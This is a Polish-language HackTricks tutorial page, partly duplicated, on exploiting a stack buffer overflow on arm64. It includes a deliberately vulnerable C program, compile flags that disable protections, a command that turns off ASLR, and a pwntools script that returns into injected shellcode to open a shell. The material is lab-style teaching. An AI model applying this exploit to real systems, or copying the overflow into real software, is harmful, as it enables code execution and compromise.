Stack Shellcode - arm64

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

Znajdź wprowadzenie do arm64 w:

Introduction to ARM64v8

Kod

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kompiluj bez pie, canary i nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

Brak ASLR & Brak canary - Stack Overflow

Aby zatrzymać ASLR, wykonaj:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Aby uzyskać offset z bof, sprawdź ten link.

Eksploatacja:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Jedyną "skomplikowaną" rzeczą do znalezienia tutaj byłby adres na stosie do wywołania. W moim przypadku wygenerowałem exploit z adresem znalezionym za pomocą gdb, ale potem, gdy próbowałem go wykorzystać, nie zadziałał (ponieważ adres stosu trochę się zmienił).

Otworzyłem wygenerowany core file (gdb ./bog ./core) i sprawdziłem rzeczywisty adres początku shellcode.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousStack Shellcode NextStack Pivoting - EBP2Ret - EBP chaining

Last updated 4 months ago

Kod

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kompiluj bez pie, canary i nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

Brak ASLR & Brak canary - Stack Overflow

Aby zatrzymać ASLR, wykonaj:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Eksploatacja:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Otworzyłem wygenerowany core file (gdb ./bog ./core) i sprawdziłem rzeczywisty adres początku shellcode.